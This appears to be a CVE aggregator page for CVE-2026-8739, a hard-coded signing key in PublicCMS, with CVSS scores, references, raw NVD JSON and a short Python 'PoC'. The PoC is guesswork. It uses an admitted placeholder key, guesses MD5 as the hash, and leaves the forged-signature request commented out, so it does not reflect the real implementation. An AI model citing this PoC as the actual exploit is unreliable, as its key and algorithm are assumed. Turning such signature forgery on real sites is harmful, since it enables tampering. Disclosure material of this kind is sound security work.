CVE-2026-8739

Description

A vulnerability was detected in Sanluan PublicCMS 5.202506.d. The affected element is the function getSignKey of the file publiccms-core/src/main/java/com/publiccms/logic/component/config/SafeConfigComponent.java. The manipulation of the argument privatefile_key results in use of hard-coded cryptographic key . The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Sanluan PublicCMS 5.202506.d

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import hashlib

# PoC for CVE-2026-8739: Hard-coded Cryptographic Key in PublicCMS
# This script demonstrates the usage of the hard-coded key to forge a signature.

# The hard-coded key found in SafeConfigComponent.java
# (Assuming key for demonstration based on typical scenarios or description)
HARDCODED_KEY = "publiccms_default_key_placeholder"

def generate_signature(data, key):
    """
    Simulates the signing process using the vulnerable hard-coded key.
    """
    # Concatenate data and key
    sign_string = data + key
    # Generate hash (e.g., MD5 or SHA256 depending on implementation)
    signature = hashlib.md5(sign_string.encode('utf-8')).hexdigest()
    return signature

def exploit(target_url):
    """
    Function to send a request with a forged signature.
    """
    malicious_data = "privatefile_key=attacker_controlled_value"
    forged_sig = generate_signature(malicious_data, HARDCODED_KEY)

    print(f"[+] Target: {target_url}")
    print(f"[+] Hard-coded Key: {HARDCODED_KEY}")
    print(f"[+] Forged Signature: {forged_sig}")
    print(f"[!] Sending malicious request with forged signature...")

    # In a real exploit, an HTTP request would be sent here.
    # requests.get(target_url, params={'data': malicious_data, 'sign': forged_sig})

if __name__ == "__main__":
    target = "http://target-publiccms.com/api/verify"
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8739
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8739
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8739/
[4] VulDB https://vuldb.com/cve/CVE-2026-8739
[5] https://vuldb.com/submit/809917
[6] https://vuldb.com/vuln/364327
[7] https://vuldb.com/vuln/364327/cti
[8] https://vulnplus-note.wetolink.com/share/PCVUlOncmwTC

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8739", "sourceIdentifier": "[email protected]", "published": "2026-05-17T08:16:23.107", "lastModified": "2026-05-17T08:16:23.107", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Sanluan PublicCMS 5.202506.d. The affected element is the function getSignKey of the file publiccms-core/src/main/java/com/publiccms/logic/component/config/SafeConfigComponent.java. The manipulation of the argument privatefile_key results in use of hard-coded cryptographic key\r . The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-320"}, {"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://vuldb.com/submit/809917", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364327", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364327/cti", "source": "[email protected]"}, {"url": "https://vulnplus-note.wetolink.com/share/PCVUlOncmwTC", "source": "[email protected]"}]}}